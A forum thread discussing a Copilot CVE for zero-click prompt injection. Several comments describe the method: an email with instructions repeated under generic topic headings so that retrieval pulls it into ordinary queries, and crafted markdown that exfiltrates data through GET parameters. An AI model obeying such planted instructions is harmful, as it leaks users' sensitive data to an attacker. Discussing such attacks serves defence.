This seems like a laughably scant CVE, even for a cloud-based product. No steps to reproduce outside of this writeup by the original researcher team (which should IMO always be present in one of the major CVE databases for posterity), no explanation of how the remediation was implemented or tested... Cloud-native products have never been great across the board for CVEs, but this really feels like a slap in the face.
Is this going to be the future of CVEs with LLMs taking over? "Hey, we had a CVSS 9.3, all your data could be exfiled for a while, but we patched it out, Trust Us®?"
the classification seems very high (9.3). looks like they've said User Interaction is none, but from reading the writeup looks like you would need the image injected into a response prompted by a user?
The attack involves sending an email with multiple copies of the attack attached to a bunch of different text, like this:
Here is the complete guide to employee onborading processes:
<attack instructions> [...]
Here is the complete guide to leave of absence management:
<attack instructions>
The idea is to have such generic, likely questions that there is a high chance that a random user prompt will trigger the attack.
very cool break down! it looks like it is very hard to defend against those. I am building a customer facing agent and I am looking for lean ways to defend against these attacks
if I understand it correctly, user's prompt does not need to be related to the specific malicious email. It's enough that such email was "indexed" by Copilot and any prompt with sensitive info request could trigger the leak.
I think "zero-click" usually refers to the interaction with the malicious software or content itself, which in this case you don't have to interact with. I'd say the need to start an interaction with Copilot here could be compared to the need to log into your computer for a zero-click malware to become effective. Alternatively, not starting the Copilot interaction is similar to not opening your browser and thus being invulnerable to a zero-click vulnerability on a website. So calling this a zero-click in Copilot is appropriate, I think.
Yeah, that's my view also. zero-click is about the general question of can you get exploited by just exercising a certain (on by default) feature.
Of course you need to use the feature in the first place, like summarize an email, extract content from a website,...
However, this isn't the first zero-click exploit in an AI app. we have seen exploits like this in LLM apps of basically all major AI app over the last 2+ years ago (including Bing Chat, now called Copilot).
No, zero click requires no interaction from the user. For a hypothetical example simply having a phone on a cellular network and being susceptible to base-band attacks. No interaction needed, just existing.
Agree with other comments here - no need for the user to engage with anything from the malicious email, only to continue using their account with some LLM interactions. The account is poisoned even for known safe self initiated interactions.
The attacker sends an email to the user which is intercepted by Copilot which processes the email and embeds the email for RAG. The mail is crafted to have a high likelihood to be retrieved during regular prompting. Then Copilot will write evil markdown crafted to exfiltrate data using GET parameters so the attack runs when the mail is received.
